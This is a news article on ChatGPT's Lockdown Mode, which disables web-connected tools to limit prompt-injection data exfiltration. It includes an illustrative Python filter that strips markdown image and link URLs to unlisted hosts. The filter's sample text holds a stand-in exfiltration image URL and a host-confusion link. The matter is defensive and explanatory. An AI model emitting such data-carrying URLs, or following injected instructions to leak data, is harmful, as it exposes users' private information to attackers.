New ChatGPT Lockdown Mode Restricts Tools That Can Enable Data Exfiltration

OpenAI has started rolling out a new Lockdown Mode in ChatGPT to eligible personal accounts to reduce the risk of data exfiltration from prompt injection attacks.
This feature is designed for individuals and organizations that handle sensitive data and require strong security guarantees. Lockdown Mode is available to logged-in users on all Free, Go, Plus, and Pro plans, as well as self-serve ChatGPT Business plans.
“Lockdown Mode is an optional advanced security setting that restricts many tools and capabilities in OpenAI products that can connect to the web or external services,” OpenAI said.
“It is designed to reduce the risk of data leakage from prompt injection attacks by reducing outgoing network requests, at the expense of disabling or limiting certain useful features.”
The defenses are intended to harden the attack surface against prompt injection, which continues to be a “borderline” problem that affects all types of large language models (LLMs).
In particular, they build on sandboxing and existing controls against URL-based data exfiltration methods to limit outgoing network requests that may transmit sensitive data to attacker-controlled infrastructure.
The idea is not to stop prompt injections from happening. Lockdown Mode also doesn’t change how memory or file loading works, or the ability to share chats. Rather, the goal is to eliminate potential ways in which data can be extracted. To do that, Lockdown Mode disables the following features:
- Live web browsing, limited to accessing cached content only
- Image support, displaying images in standard responses or retrieving images from the web
- Advanced Search
- Agent mode
- Canvas Network, which prevents users from allowing Canvas-generated code to access the network
- File downloads, which prevents downloading files for data analysis
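
The restrictions above all cut off ways for model output to trigger an outgoing request. As an added illustration (not OpenAI's implementation), the following Python sketch shows the same idea for one channel, rendered markdown: an output filter that drops images and links whose host is not on an allowlist. The allowlist, function names, and sample text are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this hypothetical deployment may load content from.
ALLOWED_HOSTS = {"cdn.example.com"}

# ![alt](url) is fetched by the client as soon as it renders; [text](url)
# needs a click. Both can carry conversation data in the URL.
MD_URL = re.compile(r'(!?)\[([^\]]*)\]\(\s*(\S+?)(?:\s+"[^"]*")?\s*\)')

def host_allowed(url):
    """True only for http(s) URLs whose real host is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    # .hostname ignores any userinfo, so "allowed-host@other-host" URLs
    # are judged by the host that would actually be contacted.
    return (parts.hostname or "").lower() in ALLOWED_HOSTS

def sanitize(text):
    """Return (safe_text, blocked_urls) for one model response."""
    blocked = []

    def repl(match):
        bang, label, url = match.groups()
        if host_allowed(url):
            return match.group(0)
        blocked.append(url)
        # Keep the visible text, drop the request-triggering URL.
        return f"[image removed: {label}]" if bang else label

    return MD_URL.sub(repl, text), blocked

# Constructed sample response, as it might look after an injected instruction.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![status](https://collector.example.net/p.png?d=CONSTRUCTED)\n"
    "![logo](https://cdn.example.com/logo.png)\n"
    "See [the docs](https://cdn.example.com@collector.example.net/docs).\n"
)

if __name__ == "__main__":
    safe, blocked = sanitize(SAMPLE)
    print(safe)
    print("blocked:", blocked)
```

Logging the blocked URLs rather than silently dropping them gives defenders a signal that an injection attempt reached the model.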
Pointing out that the feature is “not intended for everyone,” OpenAI also noted that Lockdown Mode and Developer Mode cannot be used at the same time, adding that turning one on disables the other.
“Lockdown Mode is designed to greatly reduce the risk of prompt injection-based data leakage in ChatGPT and OpenAI supported products, but does not guarantee that data leakage will not occur,” the company said. “Danger may remain with enabled applications, unexpected combinations of skills, or newly discovered techniques.”
“Lockdown mode also does not prevent all other effects of a prompt injection attack. For example, a malicious command hidden in an uploaded file can still disrupt the behavior of ChatGPT, and cause an incorrect response.”
The development comes as OpenAI also introduces a new account management feature that allows users to review active ChatGPT sessions and log out of individual sessions or all sessions if signs of unauthorized account activity are detected. The sessions listed include information about the device, the application used, approximate location, login date and time, whether the device is trusted, and whether the session is current.



